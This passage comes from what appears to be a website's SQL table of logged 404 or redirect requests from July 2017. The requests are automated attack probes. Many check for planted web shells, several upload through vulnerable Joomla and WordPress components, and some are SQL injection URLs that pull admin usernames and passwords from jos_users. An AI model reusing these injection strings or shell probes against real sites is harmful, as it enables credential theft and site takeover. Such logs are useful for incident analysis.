19:35:46','0000-00-00 00:00:00'),(11108,'http://hallcrestheights.org//images/al277.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:36:19','0000-00-00 00:00:00'),(11109,'http://hallcrestheights.org//webconfig.txt.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:36:22','0000-00-00 00:00:00'),(11110,'http://hallcrestheights.org//cache/cachee.php?z3=YWNGRDRmLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:36:26','0000-00-00 00:00:00'),(11111,'http://hallcrestheights.org//thumb.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:11','0000-00-00 00:00:00'),(11112,'http://hallcrestheights.org//SessionController.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:38:38','0000-00-00 00:00:00'),(11113,'http://hallcrestheights.org//maill.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:38:43','0000-00-00 00:00:00'),(11114,'http://hallcrestheights.org//error-log.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:38:48','0000-00-00 00:00:00'),(11115,'http://hallcrestheights.org//authenticating.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:37:31','0000-00-00 00:00:00'),(11116,'http://hallcrestheights.org//google-assist.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:37:34','0000-00-00 00:00:00'),(11117,'http://hallcrestheights.org//images/google-assist.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:38:58','0000-00-00 00:00:00'),(11118,'http://hallcrestheights.org//images/robots.txt.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:02','0000-00-00 00:00:00'),(11119,'http://hallcrestheights.org//elements.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:04','0000-00-00 00:00:00'),(11120,'http://hallcrestheights.org//xmlsrpc.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:07','0000-00-00 00:00:00'),(11121,'http://hallcrestheights.org//wp-cache.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:09','0000-00-00 00:00:00'),(11122,'http://hallcrestheights.org//images/404.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:37:53','0000-00-00 00:00:00'),(11123,'http://hallcrestheights.org//images/head.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:14','0000-00-00 00:00:00'),(11124,'http://hallcrestheights.org//cache/support.php?z3=YWNGRDRmLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:17','0000-00-00 00:00:00'),(11125,'http://hallcrestheights.org//RoseLeif.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:20','0000-00-00 00:00:00'),(11126,'http://hallcrestheights.org//Abbrevsprl.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:23','0000-00-00 00:00:00'),(11127,'http://hallcrestheights.org//show.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:38:08','0000-00-00 00:00:00'),(11128,'http://hallcrestheights.org//images/defau1t.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:38:11','0000-00-00 00:00:00'),(11129,'http://hallcrestheights.org//cli/40dd1d.php?z3=YWNGRDRmLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:38:13','0000-00-00 00:00:00'),(11130,'http://hallcrestheights.org//infos.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:37','0000-00-00 00:00:00'),(11131,'http://hallcrestheights.org//cache/defau1t.php?z3=YWNGRDRmLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:39:40','0000-00-00 00:00:00'),(11132,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/acFD4f.php',NULL,'','',1,0,'2017-07-07 19:40:16','0000-00-00 00:00:00'),(11133,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/acFD4f.php',NULL,'','',1,0,'2017-07-07 19:40:17','0000-00-00 00:00:00'),(11134,'http://hallcrestheights.org//wp-content/uploads/acFD4f.php',NULL,'','',1,0,'2017-07-07 19:40:20','0000-00-00 00:00:00'),(11135,'http://hallcrestheights.org//acFD4f.php',NULL,'','',1,0,'2017-07-07 19:39:04','0000-00-00 00:00:00'),(11136,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/acFD4f.php',NULL,'','',1,0,'2017-07-07 19:40:25','0000-00-00 00:00:00'),(11137,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-k50220-lbtr-hnnmt-qzkowt-i20162631-sxpp.htm',NULL,'','',2,0,'2017-07-07 21:42:30','0000-00-00 00:00:00'),(11138,'http://hallcrestheights.org/index.php?option=com_jdownloads&view=upload',NULL,'','',3,0,'2017-07-08 02:13:58','0000-00-00 00:00:00'),(11139,'http://hallcrestheights.org/index.php?option=com_youtubegallery&view=youtubegallery&listid=-1+union+select+1,1,1,1,1,1,1&themeid=1',NULL,'','',1,0,'2017-07-09 13:27:00','0000-00-00 00:00:00'),(11140,'http://www.hallcrestheights.org/nfrkopd-k59273-obbum-golzes-i20162631-rkwtzq/',NULL,'http://search.yahoo.co.jp/','',3,0,'2017-07-10 05:58:06','0000-00-00 00:00:00'),(11141,'http://hallcrestheights.org/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf\'',NULL,'','',1,0,'2017-07-10 09:54:16','0000-00-00 00:00:00'),(11142,'http://www.hallcrestheights.org/k7064-gnfzn-i20162633-xvjx-palt-itjshkyj.htm',NULL,'','',3,0,'2017-07-10 23:40:23','0000-00-00 00:00:00'),(11143,'http://www.hallcrestheights.org/k60840-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov-i20162637-fiibp-tquhzx-chhr.htm',NULL,'','',2,0,'2017-07-11 00:51:46','0000-00-00 00:00:00'),(11144,'http://hallcrestheights.org/xbfk.php',NULL,'','',1,0,'2017-07-11 09:19:00','0000-00-00 00:00:00'),(11145,'http://hallcrestheights.org/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=24+limit+0,1--',NULL,'','',1,0,'2017-07-11 10:31:43','0000-00-00 00:00:00'),(11146,'http://hallcrestheights.org/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=25+limit+0,1--',NULL,'','',1,0,'2017-07-11 10:32:32','0000-00-00 00:00:00'),(11147,'http://www.hallcrestheights.org/k43532-pcsc-qrufunp-i20162630-kwxpo-ideotw.htm',NULL,'https://www.google.co.jp/','',3,0,'2017-07-11 12:47:10','0000-00-00 00:00:00'),(11148,'http://hallcrestheights.org/index.php/using-joomla/extensions/components/users-component/registration-form',NULL,'','',1,0,'2017-07-11 16:03:08','0000-00-00 00:00:00'),(11149,'http://hallcrestheights.org//functions.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:27:18','0000-00-00 00:00:00'),(11150,'http://hallcrestheights.org//images/1ndex.php?z3=ZVdWQ29xLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:27:26','0000-00-00 00:00:00'),(11151,'http://hallcrestheights.org//tmp.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-07-12 14:27:38','0000-00-00 00:00:00'),(11152,'http://hallcrestheights.org//configbak.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:26:42','0000-00-00 00:00:00'),(11153,'http://hallcrestheights.org//cache/cachee.php?z3=ZVdWQ29xLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:29:00','0000-00-00 00:00:00'),(11154,'http://hallcrestheights.org//wp-cache.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:30:45','0000-00-00 00:00:00'),(11155,'http://hallcrestheights.org//includes.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:29:39','0000-00-00 00:00:00'),(11156,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:30:38','0000-00-00 00:00:00'),(11157,'http://hallcrestheights.org//SessionController.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:32:08','0000-00-00 00:00:00'),(11158,'http://hallcrestheights.org//webconfig.txt.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:30:54','0000-00-00 00:00:00'),(11159,'http://hallcrestheights.org//news.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:31:09','0000-00-00 00:00:00'),(11160,'http://hallcrestheights.org//configurationbak.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:31:31','0000-00-00 00:00:00'),(11161,'http://hallcrestheights.org//robots.txt.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:32:55','0000-00-00 00:00:00'),(11162,'http://hallcrestheights.org//images/404.php?z3=ZVdWQ29xLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:33:00','0000-00-00 00:00:00'),(11163,'http://hallcrestheights.org//sql_dump.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:33:06','0000-00-00 00:00:00'),(11164,'http://hallcrestheights.org//jconfig.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:33:12','0000-00-00 00:00:00'),(11165,'http://hallcrestheights.org//thumb.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:32:00','0000-00-00 00:00:00'),(11166,'http://hallcrestheights.org//xmlrpc-activate.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:33:51','0000-00-00 00:00:00'),(11167,'http://hallcrestheights.org//al277.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:32:33','0000-00-00 00:00:00'),(11168,'http://hallcrestheights.org//images/al277.php?z3=ZVdWQ29xLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:33:55','0000-00-00 00:00:00'),(11169,'http://hallcrestheights.org//wsdl.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:34:02','0000-00-00 00:00:00'),(11170,'http://hallcrestheights.org//wp-data.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:34:06','0000-00-00 00:00:00'),(11171,'http://hallcrestheights.org//media/1ndex.php?z3=ZVdWQ29xLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:34:39','0000-00-00 00:00:00'),(11172,'http://hallcrestheights.org//media/tmp.php?z3=ZVdWQ29xLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:33:22','0000-00-00 00:00:00'),(11173,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=ZVdWQ29xLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:34:45','0000-00-00 00:00:00'),(11174,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:34:48','0000-00-00 00:00:00'),(11175,'http://hallcrestheights.org//google-assist.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:34:53','0000-00-00 00:00:00'),(11176,'http://hallcrestheights.org//elements.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:34:25','0000-00-00 00:00:00'),(11177,'http://hallcrestheights.org//cache/defau1t.php?z3=ZVdWQ29xLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:35:49','0000-00-00 00:00:00'),(11178,'http://hallcrestheights.org//roubt.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:35:53','0000-00-00 00:00:00'),(11179,'http://hallcrestheights.org//bookmark.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:36:02','0000-00-00 00:00:00'),(11180,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:36:35','0000-00-00 00:00:00'),(11181,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:37:49','0000-00-00 00:00:00'),(11182,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:38:19','0000-00-00 00:00:00'),(11183,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:39:49','0000-00-00 00:00:00'),(11184,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:39:58','0000-00-00 00:00:00'),(11185,'http://hallcrestheights.org//A.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:39:25','0000-00-00 00:00:00'),(11186,'http://hallcrestheights.org//modules/modules/modules.php?z3=ZVdWQ29xLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:40:50','0000-00-00 00:00:00'),(11187,'http://hallcrestheights.org//wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:40:58','0000-00-00 00:00:00'),(11188,'http://hallcrestheights.org//wp-content/themes/margreetalgra/404.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:41:02','0000-00-00 00:00:00'),(11189,'http://hallcrestheights.org//wp-content/themes/twentyeleven-child/footer.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:41:09','0000-00-00 00:00:00'),(11190,'http://hallcrestheights.org//sqlbak.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:40:25','0000-00-00 00:00:00'),(11191,'http://hallcrestheights.org//images/stories/0day.php?z3=ZVdWQ29xLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:42:30','0000-00-00 00:00:00'),(11192,'http://hallcrestheights.org//install.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:42:36','0000-00-00 00:00:00'),(11193,'http://hallcrestheights.org//xmlsrpc.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:44:27','0000-00-00 00:00:00'),(11194,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:44:30','0000-00-00 00:00:00'),(11195,'http://hallcrestheights.org//shootmei.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:44:34','0000-00-00 00:00:00'),(11196,'http://hallcrestheights.org//Abbrevsprl.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:47:20','0000-00-00 00:00:00'),(11197,'http://hallcrestheights.org//RoseLeif.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:49:25','0000-00-00 00:00:00'),(11198,'http://hallcrestheights.org//wp-content/1ndex.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:51:50','0000-00-00 00:00:00'),(11199,'http://hallcrestheights.org//authenticating.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:54:04','0000-00-00 00:00:00'),(11200,'http://hallcrestheights.org//show.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:54:12','0000-00-00 00:00:00'),(11201,'http://hallcrestheights.org//cache/news.php?z3=ZVdWQ29xLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:54:25','0000-00-00 00:00:00'),(11202,'http://hallcrestheights.org//images/head.php?z3=ZVdWQ29xLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:54:30','0000-00-00 00:00:00'),(11203,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:54:34','0000-00-00 00:00:00'),(11204,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:54:38','0000-00-00 00:00:00'),(11205,'http://hallcrestheights.org//files/files.php?z3=ZVdWQ29xLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:54:14','0000-00-00 00:00:00'),(11206,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=ZVdWQ29xLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:55:36','0000-00-00 00:00:00'),(11207,'http://hallcrestheights.org//files/conn.php?z3=ZVdWQ29xLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:56:13','0000-00-00 00:00:00'),(11208,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/eWVCoq.php',NULL,'','',1,0,'2017-07-12 14:56:16','0000-00-00 00:00:00'),(11209,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/eWVCoq.php',NULL,'','',1,0,'2017-07-12 14:56:19','0000-00-00 00:00:00'),(11210,'http://hallcrestheights.org//wp-content/uploads/eWVCoq.php',NULL,'','',1,0,'2017-07-12 14:56:22','0000-00-00 00:00:00'),(11211,'http://hallcrestheights.org//eWVCoq.php',NULL,'','',1,0,'2017-07-12 14:56:26','0000-00-00 00:00:00'),(11212,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/eWVCoq.php',NULL,'','',1,0,'2017-07-12 14:56:31','0000-00-00 00:00:00'),(11213,'http://hallcrestheights.org//cache/list.php?z3=ZVdWQ29xLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-12 14:56:54','0000-00-00 00:00:00'),(11214,'http://hallcrestheights.org//images/laj.php?z3=ZVdWQ29xLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:59:36','0000-00-00 00:00:00'),(11215,'http://hallcrestheights.org//r3x.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:58:27','0000-00-00 00:00:00'),(11216,'http://hallcrestheights.org//log.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:59:52','0000-00-00 00:00:00'),(11217,'http://hallcrestheights.org//includes/u2p.php?z3=ZVdWQ29xLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:59:56','0000-00-00 00:00:00'),(11218,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=ZVdWQ29xLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:59:58','0000-00-00 00:00:00'),(11219,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=ZVdWQ29xLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 15:00:00','0000-00-00 00:00:00'),(11220,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=ZVdWQ29xLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 15:00:04','0000-00-00 00:00:00'),(11221,'http://hallcrestheights.org//update.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 15:00:06','0000-00-00 00:00:00'),(11222,'http://hallcrestheights.org//wp-main.php?z3=ZVdWQ29xLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-12 15:00:13','0000-00-00 00:00:00'),(11223,'http://hallcrestheights.org//images/robots.txt.php?z3=ZVdWQ29xLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 15:00:16','0000-00-00 00:00:00'),(11224,'http://hallcrestheights.org//cli/40dd1d.php?z3=ZVdWQ29xLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-07-12 14:58:59','0000-00-00 00:00:00'),(11225,'http://www.hallcrestheights.org/bsoapaza-i20162633-k28241-psta-sgmhcqc-mckfrdtf/',NULL,'http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwjL_pKP64XVAhVJHpQKHRemAC4QFgg5MAQ&url=http%3A%2F%2Fwww.hall','',4,0,'2017-07-13 08:27:39','0000-00-00 00:00:00'),(11226,'http://hallcrestheights.org/llx.php',NULL,'','',1,0,'2017-07-13 15:14:17','0000-00-00 00:00:00'),(11227,'http://www.hallcrestheights.org/yembjvh-k44873-tqqdc-i20162630-kzfltz-terqbw/',NULL,'','',2,0,'2017-07-13 16:06:42','0000-00-00 00:00:00'),(11228,'http://hallcrestheights.org/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=24+limit+0,1',NULL,'','',1,0,'2017-07-14 18:55:04','0000-00-00 00:00:00'),(11229,'http://hallcrestheights.org/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=25+limit+0,1',NULL,'','',1,0,'2017-07-14 18:55:53','0000-00-00 00:00:00'),(11230,'http://hallcrestheights.org/modules/mod_mapsapi/cache.php',NULL,'http://hallcrestheights.org/modules/mod_mapsapi/cache.php','',1,0,'2017-07-16 10:08:57','0000-00-00 00:00:00'),(11231,'http://hallcrestheights.org/layouts/libraries/cms/html/bootstrap/jm_license.php',NULL,'http://hallcrestheights.org/layouts/libraries/cms/html/bootstrap/jm_license.php','',1,0,'2017-07-16 10:23:48','0000-00-00 00:00:00'),(11232,'http://www.hallcrestheights.org/up.php',NULL,'','',30,0,'2017-07-16 14:25:58','0000-00-00 00:00:00'),(11233,'http://hallcrestheights.org/media/cms/css/advanced_settings.php',NULL,'http://hallcrestheights.org/media/cms/css/advanced_settings.php','',1,0,'2017-07-16 14:50:35','0000-00-00 00:00:00'),(11234,'http://hallcrestheights.org/modules/mod_custom/tmpl/puxtr.php',NULL,'http://hallcrestheights.org/modules/mod_custom/tmpl/puxtr.php','',1,0,'2017-07-16 15:03:12','0000-00-00 00:00:00'),(11235,'http://hallcrestheights.org/path/lndex.php',NULL,'http://hallcrestheights.org/path/lndex.php','',1,0,'2017-07-16 17:05:41','0000-00-00 00:00:00'),(11236,'http://hallcrestheights.org/components/com_jce/views/popup/backup.php',NULL,'http://hallcrestheights.org/components/com_jce/views/popup/backup.php','',1,0,'2017-07-16 17:13:23','0000-00-00 00:00:00'),(11237,'http://hallcrestheights.org/libraries/cms/form/stopgloal.php',NULL,'http://hallcrestheights.org/libraries/cms/form/stopgloal.php','',2,0,'2017-07-16 17:17:37','0000-00-00 00:00:00'),(11238,'http://hallcrestheights.org/libraries/fof/utils/installscript/backup.php',NULL,'http://hallcrestheights.org/libraries/fof/utils/installscript/backup.php','',2,0,'2017-07-16 17:18:57','0000-00-00 00:00:00'),(11239,'http://hallcrestheights.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload',NULL,'','',1,0,'2017-07-16 20:31:55','0000-00-00 00:00:00'),(11240,'http://hallcrestheights.org/modules/mod_articles_news/media-views-rtl.php',NULL,'http://hallcrestheights.org/modules/mod_articles_news/media-views-rtl.php','',2,0,'2017-07-17 16:23:02','0000-00-00 00:00:00'),(11241,'http://hallcrestheights.org/layouts/system_info.php',NULL,'http://hallcrestheights.org/layouts/system_info.php','',1,0,'2017-07-18 01:30:11','0000-00-00 00:00:00'),(11242,'http://hallcrestheights.org/layouts/logo_img.php',NULL,'http://hallcrestheights.org/layouts/logo_img.php','',3,0,'2017-07-18 03:33:02','0000-00-00 00:00:00'),(11243,'http://hallcrestheights.org/modules/system_info.php',NULL,'http://hallcrestheights.org/modules/system_info.php','',1,0,'2017-07-18 04:38:33','0000-00-00 00:00:00'),(11244,'http://hallcrestheights.org/templates/system_info.php',NULL,'http://hallcrestheights.org/templates/system_info.php','',1,0,'2017-07-18 04:39:00','0000-00-00 00:00:00'),(11245,'http://hallcrestheights.org/system_info.php',NULL,'http://hallcrestheights.org/system_info.php','',2,0,'2017-07-18 04:40:19','0000-00-00 00:00:00'),(11246,'http://hallcrestheights.org/bin/system_info.php',NULL,'http://hallcrestheights.org/bin/system_info.php','',1,0,'2017-07-18 04:40:47','0000-00-00 00:00:00'),(11247,'http://hallcrestheights.org/cli/system_info.php',NULL,'http://hallcrestheights.org/cli/system_info.php','',1,0,'2017-07-18 04:40:56','0000-00-00 00:00:00'),(11248,'http://hallcrestheights.org/cli/logo_img.php',NULL,'http://hallcrestheights.org/cli/logo_img.php','',8,0,'2017-07-18 04:42:18','0000-00-00 00:00:00'),(11249,'http://hallcrestheights.org/components/system_info.php',NULL,'http://hallcrestheights.org/components/system_info.php','',1,0,'2017-07-18 05:43:04','0000-00-00 